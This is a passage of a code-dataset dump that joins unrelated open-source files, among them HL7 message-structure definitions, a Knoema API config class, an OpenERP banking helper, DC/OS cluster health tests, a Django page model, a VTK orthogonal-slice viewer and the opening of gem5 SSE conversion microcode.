('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('ANYHL7SEGMENT', SEGMENTS['ANYHL7SEGMENT'], (1, 1), 'SEG'),
('ANYHL7SEGMENT', SEGMENTS['ANYHL7SEGMENT'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RTB_Z74': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RTB_Z74_ROW_DEFINITION', GROUPS['RTB_Z74_ROW_DEFINITION'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'SIU_S12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SCH', SEGMENTS['SCH'], (1, 1), 'SEG'),
('TQ1', SEGMENTS['TQ1'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('SIU_S12_PATIENT', GROUPS['SIU_S12_PATIENT'], (0, -1), 'GRP'),
('SIU_S12_RESOURCES', GROUPS['SIU_S12_RESOURCES'], (1, -1), 'GRP'),)),
'SPQ_Q08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('SPR', SEGMENTS['SPR'], (1, 1), 'SEG'),
('RDF', SEGMENTS['RDF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'SQM_S25': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('SQM_S25_REQUEST', GROUPS['SQM_S25_REQUEST'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'SQR_S25': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('SQR_S25_SCHEDULE', GROUPS['SQR_S25_SCHEDULE'], (0, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'SRM_S01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('ARQ', SEGMENTS['ARQ'], (1, 1), 'SEG'),
('APR', SEGMENTS['APR'], (0, 1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('SRM_S01_PATIENT', GROUPS['SRM_S01_PATIENT'], (0, -1), 'GRP'),
('SRM_S01_RESOURCES', GROUPS['SRM_S01_RESOURCES'], (1, -1), 'GRP'),)),
'SRR_S01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SRR_S01_SCHEDULE', GROUPS['SRR_S01_SCHEDULE'], (0, 1), 'GRP'),)),
'SSR_U04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('SSR_U04_SPECIMEN_CONTAINER', GROUPS['SSR_U04_SPECIMEN_CONTAINER'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'SSU_U03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('SSU_U03_SPECIMEN_CONTAINER', GROUPS['SSU_U03_SPECIMEN_CONTAINER'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'SUR_P09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SUR_P09_FACILITY', GROUPS['SUR_P09_FACILITY'], (1, -1), 'GRP'),)),
'TBR_R08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('RDF', SEGMENTS['RDF'], (1, 1), 'SEG'),
('RDT', SEGMENTS['RDT'], (1, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'TCU_U10': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('TCU_U10_TEST_CONFIGURATION', GROUPS['TCU_U10_TEST_CONFIGURATION'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'UDM_Q05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('URD', SEGMENTS['URD'], (1, 1), 'SEG'),
('URS', SEGMENTS['URS'], (0, 1), 'SEG'),
('DSP', SEGMENTS['DSP'], (1, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'VQQ_Q07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('VTQ', SEGMENTS['VTQ'], (1, 1), 'SEG'),
('RDF', SEGMENTS['RDF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'VXQ_V01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),)),
'VXR_V03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('VXR_V03_PATIENT_VISIT', GROUPS['VXR_V03_PATIENT_VISIT'], (0, 1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('VXR_V03_INSURANCE', GROUPS['VXR_V03_INSURANCE'], (0, -1), 'GRP'),
('VXR_V03_ORDER', GROUPS['VXR_V03_ORDER'], (0, -1), 'GRP'),)),
'VXU_V04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('VXU_V04_PATIENT', GROUPS['VXU_V04_PATIENT'], (0, 1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('VXU_V04_INSURANCE', GROUPS['VXU_V04_INSURANCE'], (0, -1), 'GRP'),
('VXU_V04_ORDER', GROUPS['VXU_V04_ORDER'], (0, -1), 'GRP'),)),
'VXX_V02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('VXX_V02_PATIENT', GROUPS['VXX_V02_PATIENT'], (1, -1), 'GRP'),)),
}
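# Note: each entry above appears to follow the shape
#     (name, definition, (min_occurrences, max_occurrences), kind)
# where a max of -1 presumably means "repeats without limit" and kind is 'SEG'
# for a plain segment or 'GRP' for a nested group. Under that reading,
# ('SFT', SEGMENTS['SFT'], (0, -1), 'SEG') would describe an optional,
# repeatable SFT segment, while ('MSH', SEGMENTS['MSH'], (1, 1), 'SEG') would
# describe a mandatory, non-repeating MSH segment.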
|
Knoema/knoema-python-driver
|
refs/heads/master
|
knoema/api_config.py
|
1
|
"""This module contains Api configuration class"""
import os
class ApiConfig(object):
"""
    This class configures the Knoema API client.
    The class contains the following fields:
    host -- the host the client connects to (defaults to 'knoema.com',
    or the KNOEMA_HOST environment variable when it is set)
    app_id -- id of the application that will access Knoema; the
    application should be created by a Knoema user or administrator
    app_secret -- secret issued when the application is created;
    it should be set together with app_id
"""
def __new__(cls):
if not hasattr(cls, 'instance'):
cls.instance = super(ApiConfig, cls).__new__(cls)
cls.instance.host = os.environ['KNOEMA_HOST'] if 'KNOEMA_HOST' in os.environ else 'knoema.com'
cls.instance.app_id = None
cls.instance.app_secret = None
return cls.instance
def __init__(self):
self.host = self.instance.host
self.app_id = self.instance.app_id
self.app_secret = self.instance.app_secret
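# Usage sketch (illustrative only; 'my_app_id' and 'my_app_secret' are
# placeholder credentials, not real values). Because ApiConfig keeps a single
# shared instance, configuring it once makes the settings visible to every
# later ApiConfig() call in the same process:
if __name__ == '__main__':
    cfg = ApiConfig()
    cfg.app_id = 'my_app_id'
    cfg.app_secret = 'my_app_secret'
    # Subsequent constructions return the same configured instance.
    assert ApiConfig() is cfg
    assert ApiConfig().app_id == 'my_app_id'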
|
danielharbor/openerp
|
refs/heads/master
|
addons/account_payment/account_move_line.py
|
73
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
from openerp.tools.translate import _
class account_move_line(osv.osv):
_inherit = "account.move.line"
def line2bank(self, cr, uid, ids, payment_type=None, context=None):
"""
        Try to return, for each ledger posting line, a corresponding bank
        account according to the payment type. This works using one of
        the banks of the partner defined on the invoice possibly
        associated with the line.
        Return the first suitable bank for the corresponding partner.
"""
payment_mode_obj = self.pool.get('payment.mode')
line2bank = {}
if not ids:
return {}
bank_type = payment_mode_obj.suitable_bank_types(cr, uid, payment_type,
context=context)
for line in self.browse(cr, uid, ids, context=context):
line2bank[line.id] = False
if line.invoice and line.invoice.partner_bank_id:
line2bank[line.id] = line.invoice.partner_bank_id.id
elif line.partner_id:
if not line.partner_id.bank_ids:
line2bank[line.id] = False
else:
for bank in line.partner_id.bank_ids:
if bank.state in bank_type:
line2bank[line.id] = bank.id
break
if not line2bank.get(line.id) and line.partner_id.bank_ids:
line2bank[line.id] = line.partner_id.bank_ids[0].id
else:
raise osv.except_osv(_('Error!'), _('There is no partner defined on the entry line.'))
return line2bank
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
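# Illustrative call sketch, kept as a comment so module behaviour is unchanged
# (pool, cr, uid, line_ids and payment_mode are hypothetical values taken from
# an OpenERP server environment). Given account.move.line ids, line2bank
# returns a mapping of line id to a partner bank id, or False when no suitable
# bank is found:
#
#     move_line_obj = pool.get('account.move.line')
#     mapping = move_line_obj.line2bank(cr, uid, line_ids, payment_type=payment_mode)
#     bank_id = mapping.get(line_ids[0])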
|
surdy/dcos
|
refs/heads/master
|
packages/dcos-integration-test/extra/test_composition.py
|
1
|
import json
import logging
import os
import platform
import subprocess
import dns.exception
import dns.resolver
import kazoo.client
import pytest
import requests
from test_helpers import expanded_config
__maintainer__ = 'mnaboka'
__contact__ = 'dcos-cluster-ops@mesosphere.io'
@pytest.mark.first
@pytest.mark.supportedwindows
def test_dcos_cluster_is_up(dcos_api_session):
def _docker_info(component):
# sudo is required for non-coreOS installs
return subprocess.check_output(['sudo', 'docker', 'version', '-f', component]).decode('utf-8').rstrip()
cluster_environment = {
"docker_client_version": _docker_info('{{.Client.Version}}'),
"docker_server_version": _docker_info('{{.Server.Version}}'),
"system_platform": platform.platform(),
"system_platform_system": platform.system(),
"system_platform_release": platform.release(),
"system_platform_version": platform.version()
}
logging.info(json.dumps(cluster_environment, sort_keys=True, indent=4))
@pytest.mark.supportedwindows
def test_leader_election(dcos_api_session):
mesos_resolver = dns.resolver.Resolver()
mesos_resolver.nameservers = dcos_api_session.masters
mesos_resolver.port = 61053
try:
mesos_resolver.query('leader.mesos', 'A')
except dns.exception.DNSException:
assert False, "Cannot resolve leader.mesos"
@pytest.mark.supportedwindows
def test_if_all_mesos_masters_have_registered(dcos_api_session):
    # Currently it is not possible to extract this information through the
    # Mesos API, so let's query ZooKeeper directly.
zk_hostports = 'zk-1.zk:2181,zk-2.zk:2181,zk-3.zk:2181,zk-4.zk:2181,zk-5.zk:2181'
zk = kazoo.client.KazooClient(hosts=zk_hostports, read_only=True)
master_ips = []
zk.start()
for znode in zk.get_children("/mesos"):
if not znode.startswith("json.info_"):
continue
master = json.loads(zk.get("/mesos/" + znode)[0].decode('utf-8'))
master_ips.append(master['address']['ip'])
zk.stop()
assert sorted(master_ips) == dcos_api_session.masters
@pytest.mark.supportedwindows
def test_if_all_exhibitors_are_in_sync(dcos_api_session):
r = dcos_api_session.get('/exhibitor/exhibitor/v1/cluster/status')
assert r.status_code == 200
correct_data = sorted(r.json(), key=lambda k: k['hostname'])
for master_node_ip in dcos_api_session.masters:
# This relies on the fact that Admin Router always proxies the local
# Exhibitor.
resp = requests.get('http://{}/exhibitor/exhibitor/v1/cluster/status'.format(master_node_ip), verify=False)
assert resp.status_code == 200
tested_data = sorted(resp.json(), key=lambda k: k['hostname'])
assert correct_data == tested_data
def test_mesos_agent_role_assignment(dcos_api_session):
state_endpoint = '/state.json'
for agent in dcos_api_session.public_slaves:
r = dcos_api_session.get(state_endpoint, host=agent, port=5051)
assert r.json()['flags']['default_role'] == 'slave_public'
for agent in dcos_api_session.slaves:
r = dcos_api_session.get(state_endpoint, host=agent, port=5051)
assert r.json()['flags']['default_role'] == '*'
def test_systemd_units_are_healthy(dcos_api_session) -> None:
"""
    Test that the system is healthy at the arbitrary point in time at which
    this test runs. This test has caught several issues in the past, as it
    serves as a very high-level assertion about the system state.
    It seems very random, but it has proven very valuable.
    We are explicit about the list of units that are expected to be present
    so that we test against a static, known reference. This avoids the case
    where dynamically generated output (e.g., from /health) does not match
    our real-world expectations and the test passes while errors occur silently.
First, we loop through the nodes returned from
the /system/health/v1/report endpoint and print the report if anything
is unhealthy.
Secondly, we check that the list of expected units matches the list
of units on every node.
"""
# Insert all the diagnostics data programmatically
master_units = [
'dcos-adminrouter.service',
'dcos-cosmos.service',
'dcos-exhibitor.service',
'dcos-history.service',
'dcos-log-master.service',
'dcos-log-master.socket',
'dcos-logrotate-master.service',
'dcos-logrotate-master.timer',
'dcos-marathon.service',
'dcos-mesos-dns.service',
'dcos-mesos-master.service',
'dcos-metronome.service',
'dcos-signal.service',
'dcos-oauth.service',
]
all_node_units = [
'dcos-checks-api.service',
'dcos-checks-api.socket',
'dcos-diagnostics.service',
'dcos-diagnostics.socket',
'dcos-gen-resolvconf.service',
'dcos-gen-resolvconf.timer',
'dcos-net.service',
'dcos-net-watchdog.service',
'dcos-pkgpanda-api.service',
'dcos-signal.timer',
'dcos-checks-poststart.service',
'dcos-checks-poststart.timer',
'dcos-telegraf.service',
'dcos-telegraf.socket']
slave_units = [
'dcos-mesos-slave.service']
public_slave_units = [
'dcos-mesos-slave-public.service']
all_slave_units = [
'dcos-docker-gc.service',
'dcos-docker-gc.timer',
'dcos-adminrouter-agent.service',
'dcos-log-agent.service',
'dcos-log-agent.socket',
'dcos-logrotate-agent.service',
'dcos-logrotate-agent.timer',
'dcos-rexray.service']
expected_units = {
"master": set(all_node_units + master_units),
"agent": set(all_node_units + all_slave_units + slave_units),
"agent_public": set(all_node_units + all_slave_units + public_slave_units),
}
# Collect the dcos-diagnostics output that `dcos-signal` uses to determine
# whether or not there are failed units.
resp = dcos_api_session.get('/system/health/v1/report?cache=0')
# We expect reading the health report to succeed.
resp.raise_for_status()
# Parse the response into JSON.
health_report = resp.json()
# The format of the /health/v1/report output is as follows:
# {
# "Nodes": { ... },
# "Units": {
# "dcos-unit-foo.service": {
# "UnitName": "dcos-unit-foo.service",
# "Nodes": [
# {
# "Role": "agent" (or "agent_public", or "master")
# "IP": "172.17.0.2",
# "Host": "dcos-e2e-7dd6638e-a6f5-4276-bf6b-c9a4d6066ea4-master-2",
# "Health": 0 if node is healthy, 1 if unhealthy,
# "Output": {
# "dcos-unit-bar.service": "" (empty string if healthy),
# "dcos-unit-foo.service": "journalctl output" (if unhealthy),
# }
# },
# ...
# ]
# }
# }
# }
# Test that all nodes have the correct set of dcos-* systemd units.
units_per_node = {}
exp_units_per_node = {}
for node, node_health in health_report["Nodes"].items():
role = node_health["Role"] # Is one of master, agent, agent_public
units_per_node[node] = set(node_health["Output"])
exp_units_per_node[node] = expected_units[role]
assert units_per_node == exp_units_per_node
# Test that there are no unhealthy nodes.
unhealthy_nodes = 0
for node, node_health in health_report["Nodes"].items():
# Assert that this node is healthy.
if node_health["Health"] != 0:
logging.info("Node {} was unhealthy: {}".format(
node, json.dumps(node_health, indent=4, sort_keys=True)))
unhealthy_nodes += 1
assert unhealthy_nodes == 0
def test_signal_service(dcos_api_session):
"""
    signal-service runs on an hourly timer; this test runs it as a one-off
    and pushes the results to the test_server app for easy retrieval.
When this test fails due to `dcos-checks-poststart-service-unhealthy`,
consider that the issue may be due to check timeouts which are too low.
"""
# This is due to caching done by dcos-diagnostics / Signal service
# We're going to remove this soon: https://mesosphere.atlassian.net/browse/DCOS-9050
dcos_version = os.environ["DCOS_VERSION"]
with open('/opt/mesosphere/etc/dcos-signal-config.json', 'r') as f:
signal_config_data = json.load(f)
customer_key = signal_config_data.get('customer_key', '')
enabled = signal_config_data.get('enabled', 'false')
with open('/var/lib/dcos/cluster-id', 'r') as f:
cluster_id = f.read().strip()
if enabled == 'false':
pytest.skip('Telemetry disabled in /opt/mesosphere/etc/dcos-signal-config.json... skipping test')
logging.info("Version: " + dcos_version)
logging.info("Customer Key: " + customer_key)
logging.info("Cluster ID: " + cluster_id)
signal_results = subprocess.check_output(["/opt/mesosphere/bin/dcos-signal", "-test"], universal_newlines=True)
r_data = json.loads(signal_results)
resp = dcos_api_session.get('/system/health/v1/report?cache=0')
# We expect reading the health report to succeed.
resp.raise_for_status()
# Parse the response into JSON.
health_report = resp.json()
# Reformat the /health json into the expected output format for dcos-signal.
units_health = {}
for unit, unit_health in health_report["Units"].items():
unhealthy = 0
for node_health in unit_health["Nodes"]:
for output_unit, output in node_health["Output"].items():
if unit != output_unit:
# This is the output of some unrelated unit, ignore.
continue
if output == "":
# This unit is healthy on this node.
pass
else:
# This unit is unhealthy on this node.
unhealthy += 1
prefix = "health-unit-{}".format(unit.replace('.', '-'))
units_health.update({
"{}-total".format(prefix): len(unit_health["Nodes"]),
"{}-unhealthy".format(prefix): unhealthy,
})
exp_data = {
'diagnostics': {
'event': 'health',
'anonymousId': cluster_id,
'properties': units_health,
},
'cosmos': {
'event': 'package_list',
'anonymousId': cluster_id,
'properties': {}
},
'mesos': {
'event': 'mesos_track',
'anonymousId': cluster_id,
'properties': {}
}
}
# Generic properties which are the same between all tracks
generic_properties = {
'platform': expanded_config['platform'],
'provider': expanded_config['provider'],
'source': 'cluster',
'clusterId': cluster_id,
'customerKey': customer_key,
'environmentVersion': dcos_version,
'variant': 'open'
}
# Insert the generic property data which is the same between all signal tracks
exp_data['diagnostics']['properties'].update(generic_properties)
exp_data['cosmos']['properties'].update(generic_properties)
exp_data['mesos']['properties'].update(generic_properties)
# Check the entire hash of diagnostics data
if r_data['diagnostics'] != exp_data['diagnostics']:
# The optional second argument to `assert` is an error message that
# appears to get truncated in the output. As such, we log the output
# instead.
logging.error("Cluster is unhealthy: {}".format(
json.dumps(health_report, indent=4, sort_keys=True)))
assert r_data['diagnostics'] == exp_data['diagnostics']
# Check a subset of things regarding Mesos that we can logically check for
framework_names = [x['name'] for x in r_data['mesos']['properties']['frameworks']]
assert 'marathon' in framework_names
assert 'metronome' in framework_names
# There are no packages installed by default on the integration test, ensure the key exists
assert len(r_data['cosmos']['properties']['package_list']) == 0
|
JanOosting/ed-questionnaire
|
refs/heads/master
|
questionnaire/page/models.py
|
1
|
from django.db import models
from django.core.urlresolvers import reverse
class Page(models.Model):
slug = models.SlugField(unique=True, primary_key=True)
title = models.CharField(u"Title", max_length=256)
body = models.TextField(u"Body")
public = models.BooleanField(default=True)
def __unicode__(self):
return u"Page[%s]" % self.slug
def get_absolute_url(self):
return reverse('questionnaire.page.views.page', kwargs={'page_to_render':self.slug})
|
berendkleinhaneveld/VTK
|
refs/heads/master
|
Examples/GUI/Python/OrthogonalPlanesWithTkPhoto.py
|
9
|
import vtk
from vtk import *
import Tkinter
from Tkinter import *
import sys, os
import vtk.tk
import vtk.tk.vtkLoadPythonTkWidgets
import vtk.tk.vtkTkImageViewerWidget
from vtk.tk.vtkTkPhotoImage import *
from vtk.util.misc import *
class SampleViewer:
def __init__ ( self ):
self.Tk = Tk = Tkinter.Tk();
Tk.title ( 'Python Version of vtkImageDataToTkPhoto' );
# Image pipeline
reader = vtkVolume16Reader ()
reader.SetDataDimensions ( 64, 64 )
reader.SetDataByteOrderToLittleEndian ( )
reader.SetFilePrefix ( vtkGetDataRoot() + '/Data/headsq/quarter' )
reader.SetImageRange ( 1, 93 )
reader.SetDataSpacing ( 3.2, 3.2, 1.5 )
reader.Update ()
self.cast = cast = vtkImageCast()
cast.SetInputConnection( reader.GetOutputPort() )
cast.SetOutputScalarType ( reader.GetOutput().GetScalarType() )
cast.ClampOverflowOn()
# Make the image a little bigger
self.resample = resample = vtkImageResample ()
resample.SetInputConnection( cast.GetOutputPort() )
resample.SetAxisMagnificationFactor ( 0, 2 )
resample.SetAxisMagnificationFactor ( 1, 2 )
resample.SetAxisMagnificationFactor ( 2, 1 )
l,h = reader.GetOutput().GetScalarRange()
# Create the three orthogonal views
        tphoto = self.tphoto = vtkTkPhotoImage ();
cphoto = self.cphoto = vtkTkPhotoImage ();
sphoto = self.sphoto = vtkTkPhotoImage ();
reader.Update()
d = reader.GetOutput().GetDimensions()
        self.Position = [ int(d[0]/2.0), int(d[1]/2.0), int(d[2]/2.0) ]
# Create a popup menu
v = IntVar()
self.popup = popup = Menu ( Tk, tearoff=0 )
popup.add_radiobutton ( label='unsigned char', command=self.CastToUnsignedChar, variable=v, value=-1 )
popup.add_radiobutton ( label='unsigned short', command=self.CastToUnsignedShort, variable=v, value=0 )
        popup.add_radiobutton ( label='unsigned int', command=self.CastToUnsignedInt, variable=v, value=1 )
popup.add_radiobutton ( label='float', command=self.CastToFloat, variable=v, value=2 )
v.set ( 0 )
w = self.TransverseLabelWidget = Label ( Tk, image = tphoto )
w.grid ( row = 0, column = 0 )
w.bind ( "<Button1-Motion>", lambda e, i=tphoto, o='transverse', s=self: s.Motion ( e, i, o ) )
w.bind ( "<Button-3>", self.DoPopup )
w = Label ( Tk, image = cphoto )
w.grid ( row = 1, column = 0 )
w.bind ( "<Button1-Motion>", lambda e, i=cphoto, o='coronal', s=self: s.Motion ( e, i, o ) )
w.bind ( "<Button-3>", self.DoPopup )
w = Label ( Tk, image = sphoto )
w.grid ( row = 0, column = 1 )
w.bind ( "<Button1-Motion>", lambda e, i=sphoto, o='sagittal', s=self: s.Motion ( e, i, o ) )
w.bind ( "<Button-3>", self.DoPopup )
w = self.WindowWidget = Scale ( Tk, label='Window', orient='horizontal', from_=1, to=(h-l)/2, command = self.SetWindowLevel )
w = self.LevelWidget = Scale ( Tk, label='Level', orient='horizontal', from_=l, to=h, command=self.SetWindowLevel )
self.WindowWidget.grid ( row=2, columnspan=2, sticky='ew' )
self.LevelWidget.grid ( row=3, columnspan=2, sticky='ew' );
self.WindowWidget.set ( 1370 );
self.LevelWidget.set ( 1268 );
w = self.LabelWidget = Label ( Tk, bd=2, relief='raised' )
w.grid ( row=4, columnspan=2, sticky='ew' )
w.configure ( text = "Use the right mouse button to change data type" )
def DoPopup ( self, event ):
self.popup.post ( event.x_root, event.y_root )
def CastToUnsignedChar ( self ):
self.cast.SetOutputScalarTypeToUnsignedChar()
self.SetImages()
def CastToUnsignedShort ( self ):
self.cast.SetOutputScalarTypeToUnsignedShort()
self.SetImages()
def CastToUnsignedInt ( self ):
self.cast.SetOutputScalarTypeToUnsignedInt()
self.SetImages()
def CastToFloat ( self ):
self.cast.SetOutputScalarTypeToFloat()
self.SetImages()
def Motion ( self, event, image, orientation ):
w = image.width();
h = image.height()
if orientation == 'transverse':
self.Position[0] = event.x
self.Position[1] = h - event.y - 1
if orientation == 'coronal':
self.Position[0] = event.x;
self.Position[2] = event.y
if orientation == 'sagittal':
self.Position[1] = w - event.x - 1
self.Position[2] = event.y
self.LabelWidget.configure ( text = "Position: %d, %d, %d" % tuple ( self.Position ) )
self.SetImages()
def SetWindowLevel ( self, event ):
self.SetImages()
def SetImages ( self ):
Window = self.WindowWidget.get()
Level = self.LevelWidget.get()
image = self.resample.GetOutput()
self.tphoto.PutImageSlice ( self.resample.GetOutputPort(),
self.Position[2],
'transverse',
Window,
Level )
self.sphoto.PutImageSlice ( self.resample.GetOutputPort(),
self.Position[0],
'sagittal',
Window,
Level )
self.cphoto.PutImageSlice ( self.resample.GetOutputPort(),
self.Position[1],
'coronal',
Window,
Level )
if __name__ == '__main__':
S = SampleViewer()
S.Tk.mainloop()
|
powerjg/gem5-ci-test
|
refs/heads/master
|
src/arch/x86/isa/insts/simd128/floating_point/data_conversion/convert_floating_point_to_floating_point.py
|
90
|
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop CVTSS2SD_XMM_XMM {
cvtf2f xmml, xmmlm, destSize=8, srcSize=4, ext=Scalar
};
def macroop CVTSS2SD_XMM_M {
ldfp ufp1, seg, sib, disp, dataSize=8
cvtf2f xmml, ufp1, destSize=8, srcSize=4, ext=Scalar
};
def macroop CVTSS2SD_XMM_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
cvtf2f xmml, ufp1, destSize=8, srcSize=4, ext=Scalar
};
def macroop CVTSD2SS_XMM_XMM {
cvtf2f xmml, xmmlm, destSize=4, srcSize=8, ext=Scalar
};
def macroop CVTSD2SS_XMM_M {
ldfp ufp1, seg, sib, disp, dataSize=8
cvtf2f xmml, ufp1, destSize=4, srcSize=8, ext=Scalar
};
def macroop CVTSD2SS_XMM_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
cvtf2f xmml, ufp1, destSize=4, srcSize=8, ext=Scalar
};
def macroop CVTPS2PD_XMM_XMM {
